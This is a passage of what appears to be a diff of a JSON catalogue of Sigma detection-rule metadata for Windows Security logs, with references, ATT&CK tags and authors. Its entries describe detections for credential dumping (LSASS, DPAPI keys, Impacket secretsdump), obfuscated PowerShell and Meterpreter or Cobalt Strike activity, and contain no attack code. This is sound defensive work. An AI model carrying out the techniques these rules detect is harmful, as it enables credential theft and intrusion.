"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ], - "creation_date": "2019/06/20", - "filename": "win_security_dpapi_domain_backupkey_extraction.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects anyone attempting a backup for the DPAPI Master Key. 
This events gets generated at the source and not the Domain Controller.", - "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", - "value": "DPAPI Domain Master Key Backup Attempt", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ], - "creation_date": "2019/08/10", - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", - "value": "COMPlus_ETWEnabled Registry Modification", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - 
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/06/05", - "filename": "win_security_etw_modification.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", - "value": "Security Event Log Cleared", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" - ], - "tags": [ - "attack.t1070.001" - ], - "creation_date": "2021/08/15", - "filename": "win_security_event_log_cleared.yml", - "author": "Saw Winn Naung", - "level": "medium", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", - "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "meta": { - "refs": [ - "https://twitter.com/INIT_3/status/1410662463641731075", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/07/02", - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", - "author": "INIT_6", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", - "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", - "value": "External Disk Drive Or USB Storage Device", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" - ], - "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" - ], - "creation_date": "2019/11/20", - "filename": "win_security_external_device.yml", - "author": "Keith Wright", - "level": "low", - "falsepositive": [ - "Legitimate administrative activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). 
Adjust Threshold according to domain width.", - "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", - "value": "Enumeration via the Global Catalog", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ], - "creation_date": "2020/05/11", - "filename": "win_security_global_catalog_enumeration.yml", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "level": "medium", - "falsepositive": [ - "Exclude known DCs." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "value": "Persistence and Execution at Scale via GPO Scheduled Task", - "meta": { - "refs": [ - "https://twitter.com/menasec1/status/1106899890377052160", - "https://www.secureworks.com/blog/ransomware-as-a-distraction", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" - ], - "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" - ], - "creation_date": "2019/04/03", - "filename": "win_security_gpo_scheduledtasks.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "value": "Hidden Local User Creation", - "meta": { - "refs": [ - 
"https://twitter.com/SBousseaden/status/1387743867663958021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ], - "creation_date": "2021/05/03", - "filename": "win_security_hidden_user_creation.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "value": "HybridConnectionManager Service Installation", - "meta": { - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ], - "creation_date": "2021/04/12", - "filename": "win_security_hybridconnectionmgr_svc_installation.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
- ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Impacket's psexec.py.", - "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", - "value": "Impacket PsExec Execution", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/12/14", - "filename": "win_security_impacket_psexec.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "value": "Possible Impacket SecretDump Remote Activity", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" - ], - "creation_date": "2019/04/03", - "filename": "win_security_impacket_secretdump.yml", - "author": "Samir Bousseaden, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "value": "Invoke-Obfuscation CLIP+ Launcher - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "win_security_invoke_obfuscation_clip_services_security.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/11/08", - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", - "value": "Invoke-Obfuscation STDIN+ Launcher - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", - "value": "Invoke-Obfuscation VAR+ Launcher - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "win_security_invoke_obfuscation_var_services_security.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "value": "Invoke-Obfuscation Via Stdin - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "value": "Invoke-Obfuscation Via Use Clip - Security", - "meta": { - "refs": [ - 
"https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "value": "Invoke-Obfuscation Via Use MSHTA - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "value": "Invoke-Obfuscation Via Use Rundll32 - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - 
"creation_date": "2020/10/09", - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the mount of ISO images on an endpoint", - "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "value": "ISO Image Mount", - "meta": { - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://twitter.com/MsftSecIntel/status/1257324139515269121", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2021/05/29", - "filename": "win_security_iso_mount.yml", - "author": "Syed Hasan (@syedhasan009)", - "level": 
"medium", - "falsepositive": [ - "Software installation ISO files" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", - "value": "First Time Seen Remote Named Pipe", - "meta": { - "refs": [ - "https://twitter.com/menasec1/status/1104489274387451904", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2019/04/03", - "filename": "win_security_lm_namedpipe.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", - "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", - "value": "Correct Execution of Nltest.exe", - "meta": { - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", - "https://attack.mitre.org/software/S0359/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1018", - "attack.t1016" - ], - "creation_date": "2021/10/04", - "filename": "win_security_lolbas_execution_of_nltest.yml", - "author": "Arun Chauhan", - "level": "high", - "falsepositive": [ - "Red team activity", - "Rare legitimate use by an administrator" - ], - "logsource.category": "No established category", - "logsource.product": 
"windows" - } - }, - { - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "value": "LSASS Access from Non System Account", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2019/06/20", - "filename": "win_security_lsass_access_non_system_account.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "value": "Credential Dumping Tools Service Execution - Security", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ], - "creation_date": "2017/03/05", - "filename": "win_security_mal_creddumper.yml", - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects known malicious service installs that only appear in 
cases of lateral movement, credential dumping, and other suspicious activities.", - "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "value": "Malicious Service Installations", - "meta": { - "refs": [ - "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" - ], - "creation_date": "2017/03/27", - "filename": "win_security_mal_service_installs.yml", - "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "value": "WCE wceaux.dll Access", - "meta": { - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" - ], - "creation_date": "2017/06/14", - "filename": "win_security_mal_wceaux_dll.yml", - "author": "Thomas Patzke", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Alerts on Metasploit host's authentications on the domain.", - "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", - "value": "Metasploit SMB 
Authentication", - "meta": { - "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/05/06", - "filename": "win_security_metasploit_authentication.yml", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "level": "high", - "falsepositive": [ - "Linux hostnames composed of 16 characters." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", - "value": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "meta": { - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2021/01/21", - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", - "author": "Bartlomiej Czyz, Relativity", - "level": "high", - "falsepositive": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", 
- "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "critical", - "falsepositive": [ - "Highly unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects NetNTLM downgrade attack", - "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "value": "NetNTLM Downgrade Attack", - "meta": { - "refs": [ - "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], - "creation_date": "2018/03/20", - "filename": "win_security_net_ntlm_downgrade.yml", - "author": "Florian Roth, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", - "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "value": "Windows Network Access Suspicious desktop.ini Action", - "meta": { - "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ], - "creation_date": "2021/12/06", - "filename": "win_security_net_share_obj_susp_desktop_ini.yml", - "author": "Tim Shelton (HAWK.IO)", - "level": "medium", - "falsepositive": [ - "Read only access list authority" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/10/25", - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "value": "Denied Access To Remote Desktop", - "meta": { - "refs": [ - 
